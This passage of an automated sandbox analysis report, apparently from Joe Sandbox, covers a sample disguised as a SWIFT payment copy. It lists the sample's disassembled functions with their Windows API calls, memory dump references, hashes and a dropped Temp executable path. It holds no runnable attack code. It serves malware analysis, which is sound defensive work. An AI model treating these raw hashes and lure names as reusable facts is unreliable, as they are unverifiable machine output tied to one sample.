                                                                                                                        • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004030B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                        • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
                                                                                                                        • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                        • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004030E2 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000089E4), ref: 004030F0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                                        • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                                                                        • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                                        • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00404FF1 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405050
                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040505F
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040509C
                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004050A4
                                                                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
                                                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
                                                                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
                                                                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
                                                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405140
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405161
                                                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
                                                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
                                                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040506E
                                                                                                                          • Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004051B3
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004F85,00000000), ref: 004051C1
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                                                                                                        • ShowWindow.USER32(00000000), ref: 004051EC
                                                                                                                        • ShowWindow.USER32(00000000,00000008), ref: 004051F1
                                                                                                                        • ShowWindow.USER32(00000008), ref: 00405238
                                                                                                                        • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040526A
                                                                                                                        • CreatePopupMenu.USER32 ref: 0040527B
                                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405290
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004052A3
                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405312
                                                                                                                        • EmptyClipboard.USER32 ref: 00405318
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                                                                                                        • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040532B
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 00405362
                                                                                                                        • CloseClipboard.USER32 ref: 00405368
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                        • String ID: (`_${
                                                                                                                        • API String ID: 590372296-1567245380
                                                                                                                        • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                                                        • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                                                                                                        • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                                                        • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404802 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404819
                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404826
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404872
                                                                                                                        • LoadBitmapA.USER32(0000006E), ref: 00404885
                                                                                                                        • SetWindowLongA.USER32(?,000000FC,00404E03), ref: 0040489F
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
                                                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
                                                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
                                                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
                                                                                                                        • DeleteObject.GDI32(?), ref: 004048FF
                                                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
                                                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404A39
                                                                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A47
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404A58
                                                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
                                                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
                                                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
                                                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
                                                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404C34
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404C44
                                                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
                                                                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
                                                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404DDA
                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404DE5
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404DEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                        • String ID: $(`_$M$N
                                                                                                                        • API String ID: 1638840714-1623159249
                                                                                                                        • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                                                        • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                                                                                                                        • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                                                        • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004042C1 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 273stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404310
                                                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                                                                                                        • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                                                                                                        • lstrcmpiA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,0042A0A0), ref: 00404428
                                                                                                                        • lstrcatA.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ), ref: 00404434
                                                                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404446
                                                                                                                          • Part of subcall function 0040546C: GetDlgItemTextA.USER32(?,?,00000400,0040447D), ref: 0040547F
                                                                                                                          • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                                                          • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                                                          • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                                                          • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                                                                                                          • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                                                          • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                                                                                                          • Part of subcall function 00404678: SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\btpqr.exe" $(`_$A$C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 2624150263-1686142790
                                                                                                                        • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                                                        • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                                                                                                        • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                                                        • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402053 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 123533781-3707357800
                                                                                                                        • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                                                        • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                                                                                                                        • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                                                        • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402671 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1974802433-0
                                                                                                                        • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                                                                                        • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
                                                                                                                        • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                                                                                        • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406354 Relevance: .3, Instructions: 334COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                                                                                        • Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
                                                                                                                        • Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
                                                                                                                        • Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406B2B Relevance: .3, Instructions: 300COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                                                                                        • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
                                                                                                                        • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                                                                                        • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403FCB Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 204windowstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404056
                                                                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 0040406A
                                                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
                                                                                                                        • GetSysColor.USER32(?), ref: 00404099
                                                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
                                                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004040C1
                                                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
                                                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404141
                                                                                                                        • SendMessageA.USER32(00000000), ref: 00404144
                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040416F
                                                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
                                                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004041BE
                                                                                                                        • SetCursor.USER32(00000000), ref: 004041C7
                                                                                                                        • ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004041E7
                                                                                                                        • SetCursor.USER32(00000000), ref: 004041EA
                                                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
                                                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
